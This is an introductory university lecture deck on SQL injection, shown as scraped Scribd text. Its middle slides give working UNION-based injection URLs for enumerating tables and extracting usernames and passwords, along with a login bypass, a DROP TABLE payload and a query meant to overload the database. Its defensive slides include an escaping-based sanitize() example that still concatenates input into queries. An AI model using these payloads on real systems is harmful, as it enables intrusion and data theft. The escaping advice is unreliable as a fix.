Scribd Logo
Upload

Welcome to Scribd!

  • A Brief Intorduction in SQL Injection

    Uploaded by

    Sina Manavi
    43 views22 pages
    Basic concepts in sql injection and web application vulnerabilities

    Original Title

    A brief Intorduction in SQL Injection

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PPT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Basic concepts in sql injection and web application vulnerabilities

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PPT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    43 views22 pages

    A Brief Intorduction in SQL Injection

    Uploaded by

    Sina Manavi
    Basic concepts in sql injection and web application vulnerabilities

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PPT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 22

    Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http://sinamanavi.blogspot.com/p/about -me.

    html

    Introduction Why SQL Injection What is needed for this What you can do with SQL Injection What are its pros and cons Why we need to know and how we can prevent our database from SQL injection attacks

    We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access

    SQL Injection may happen only two form of UI based or URL based
    (1) Injecting into a form. Such as username and password boxes on a login page. (2) Injecting into a URL. Like

    http://yourtarget.com/products/list.php?pid=10

    Simple example:

    Select ID from tbl_users

    Where ID=Uid and pass=pass


    If it returns any value means that the current inputs are correct

    www.yourtarget.com/list?id=5
    if you want to view a record from a table by the URL based injection:
    Select * from tbl_users
    Where id=5

    The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change.
    Tables holding all the tables name: Tables holding all the Column name:
    "INFORMATION_SCHEMA.COLUMNS. "INFORMATION_SCHEMA.TABLES.

    Finding the URL quantity:

    www.yourtarget.com/list.php? ID=10+ORDER+BY+1--

    Finding Table name

    Increase the 1 , until you got error, then the last number is the column number
    www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--

    And it shows:

    tbl_user

    To Be continued

    Now its time to find out the Column names:


    www.yourtarget.com/list.php? ID =

    -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+
    WHERE+table_name=tbl_user'--

    The result would be as following : id,username,password

    Column names finding step:


    www.yourtarget.com/list.php? ID =
    -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS
    +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column' Try the columns name until you find your target (e.g username,password, or login)

    And Finally its time to see the records:


    www.yourtarget.com/list.php? =1+UNION+SELECT+1,username,3+FROM+UserAccounts

    And
    www.yourtarget.com/list.php? =1+UNION+SELECT+1,password,3+FROM+UserAccounts Username=admin Stupid admin ha ;) password=123456

    Now we can Alter the records as well, lets rock

    UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command

    If user_list contains 1000 records then, the database is fired up


    SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list

    Insert newuser into tbl_user


    The maliciouse code can be :

    DROP table tbl_user

    How it works

    Select * from tbl_users

    SELECT * FROM table WHERE id= Fname' or '1'='1'; if(mysql_num_rows($result)) //do login
    Now the unauthorized user get accessed easily and bypassed the authorization

    Malicious Code:

    Where id=Fname and pass=pass

    Security is the developers job No database, connector, or framework can prevent SQL injection all the time

    Implement proper Error Handling. This would include using a single error message for all errors.
    Lock down User Database configuration, Specify users, roles and permissions etc. prefix and append a quote to all user input, even if the data is numeric .

    <?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");

    Vipin Samar, Oracle vice president of Database Security:

    Database Firewall is a good first layer of defense for databases but it won't protect you from everything,

    Using Stroprocedures:
    CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END

    CALL SP_show_user (54)


    Might be helpful but still vulnerable

    I dont have to worry anymore Escaping is the fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fix SQL privileges are the fix My app doesnt need security Frameworks are the fix Parameters quote for you Parameters are the fix Parameters make queries slow SQL proxies are the fix NoSQL databases are the fix

    NoSQL databases are immune to SQL injection.

    You might also like